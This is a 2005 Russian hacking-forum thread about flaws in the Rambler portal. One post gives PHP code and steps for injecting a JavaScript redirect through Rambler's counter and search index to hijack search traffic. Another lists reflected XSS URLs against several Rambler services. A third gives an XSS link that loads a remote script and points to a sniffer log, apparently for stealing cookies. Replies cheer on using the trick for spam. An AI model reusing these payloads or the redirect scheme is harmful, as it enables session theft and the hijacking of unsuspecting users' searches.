ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 16.09.2005, 16:08
Аватар для Kanick
Kanick
Познающий
Регистрация: 06.09.2005
Сообщений: 67
Провел на форуме:
215526

Репутация: 85
Отправить сообщение для Kanick с помощью ICQ
По умолчанию

Ни черта себе!
Нет слов!

Покопаюсь-ка я тоже.
 
Ответить с цитированием

  #12  
Старый 16.09.2005, 18:08
Аватар для Егорыч+++
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию

Да забавный факт нашел Dmitro. Поработаем над ним.
 
Ответить с цитированием

  #13  
Старый 16.09.2005, 20:09
Аватар для Kanick
Kanick
Познающий
Регистрация: 06.09.2005
Сообщений: 67
Провел на форуме:
215526

Репутация: 85
Отправить сообщение для Kanick с помощью ICQ
По умолчанию

Как мне передали, дыра на Рамблере старая и бесперспективная.
Рамблер даже куки не оставляет.
Единственный возможный вариант использования - редирект на свой сайт. Что ж, отличный прием для раскрутки.

Последний раз редактировалось Kanick; 16.09.2005 в 20:11..
 
Ответить с цитированием

  #14  
Старый 19.09.2005, 20:30
Аватар для censored!
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258

Репутация: 648


По умолчанию

Цитата:
Что ж, отличный прием для раскрутки
Угук. Раскрутить один раз сайт на слово "работа" (ну или порно) и все. Потом кто вобьет в поиске "работа" - редиректом на сайт Дмитро будет попадать (наращивая раскрутку как снежный ком).

Дмитро - респект. Действительно откопал забавную штуку. =)
__________________
+ (это не крестик, это плюсик!)
__________________


 
Ответить с цитированием

итог
  #15  
Старый 18.11.2005, 01:09
Аватар для Dmitro
Dmitro
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме:
130949

Репутация: 34
Отправить сообщение для Dmitro с помощью ICQ
По умолчанию итог

Вообщем , чтоб было всем понятнее, делаем так:
1) В index.php пишем повыше на странице :
********************************
<?php
if(isset($_GET['ID'])){$ID = ereg_replace("[^0-9_]","<script language='Javascript'><!--
function reload() {location = \"http://ВАШ_САЙТ.ru\"}; setTimeout('reload()', 10);
//--></script>",$_GET['ID']);}
echo $ID;
echo "<br><b>".$ID."</b><br><a href=\"http://ВАШ_САЙТ/?".$ID."\">". $ID."</a>";
?>
*********************************
// Зачем три раза повторять $ID ? - Чёртиво знает, откуда рамблер его тянет, толи из ссылки, толи из тега... кашу маслом не испортишь, а там можно и поэксперементировать ))
2) Затем делаем URL запрос http://ВАШ_САЙТ.ru/?ID=[Любые буквы или символы]
желательно побольше таких запросов с разными буквами после "?"
После чего счётчик rambler top-100 на этой странице фиксирует эти запросы, ( их можно посмотреть в статистике посещений ) , затем через какое-то время их индексирует поисковик рамблера. И всё !
3) После индексации будет редирект на Ваш сайт прямо из Рамблера.
А можно сделать ещё круче, т.е. сделать действительно снежный ком !!
Создать массив слов и чисел, создать рандом переменную , состоящую из "слово+число" и добавить эту переменную в редирект, т.е.
"http://Ваш_сайт.ru/?".$random
тем самым получим цыкл...
Ну вот вроде разжевали )))
 
Ответить с цитированием

  #16  
Старый 18.11.2005, 03:05
Аватар для Dmitro
Dmitro
Участник форума
Регистрация: 11.12.2004
Сообщений: 110
Провел на форуме:
130949

Репутация: 34
Отправить сообщение для Dmitro с помощью ICQ
По умолчанию

Вон кстати ребятишки чё нашли:

Цитата:

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?
ftype=5&form=%3Cscript%3Ealert(/XSS/)%3C/script%3E&site=
ftp.elektra.ru&dir=%3Cscript%3Ealert(/XSS/)%3C/script%3E
http://finance.rambler.ru/db/chain.h...=fix&chain_id=
!RUBFIX=%3Cscript%3Ealert(/XSS/)%3C/script%3E&show_ind_lst=
rustypes&show_ind_lst=curs
http://finance.rambler.ru/db/chain.html?show_ind_lst=
fortypes&type=forex&chain_id=!FX=%3Cscript%3Ealert (/XSS/)%3C/script%3E
http://pokupki.rambler.ru/?action=go...r=&no_img=&dl=
&s=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E &minp=
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&ma xp=
%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&x= 60&y=14&cat=80%2F36%2F3%2F0
http://smi.rambler.ru/main.cgi?action=
%3Cscript%3Ealert('XSS')%3C/script%3E&name=sources/index.html
http://www.rambler.ru/db/sport/news.html?d=
%3Cscript%3Ealert('XSS')%3C/script%3E
Источник: http://antisec.2x4.ru/advisories/rambler.txt
 
Ответить с цитированием

Еще
  #17  
Старый 18.11.2005, 03:14
Аватар для SNIFF
SNIFF
junior admin
Регистрация: 15.11.2004
Сообщений: 105
Провел на форуме:
623414

Репутация: 12
Post Еще

http://health.rambler.ru/drugs/results.html?words=<script>alert%20('XSS%20b%20y%2 0SNIFF')</script><script%20src=http://www.fath.jino-net.ru/hack.js></script>

Потом на http://antichat.ru/sniff/log.php

Последний раз редактировалось SNIFF; 18.11.2005 в 03:17..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ